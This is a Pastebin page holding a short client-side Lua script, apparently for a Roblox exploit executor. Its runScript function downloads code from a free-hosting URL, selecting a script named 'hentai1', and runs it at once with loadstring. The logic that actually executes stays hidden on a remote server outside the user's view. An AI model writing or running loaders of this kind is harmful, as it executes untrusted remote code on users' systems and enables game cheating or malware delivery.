Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --[[ Author: Staylin Engine: Lua 5.1 Type: Client-Sided--]]
- Main = {
- runScript = function(...)
- if ... ~= nil then
- local x = ...
- local z = game:HttpGet("http://elistout804.000webhostapp.com/scripts.php?script="..x,true)
- loadstring(z)()
- end
- end
- };
- Main.runScript("hentai1");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement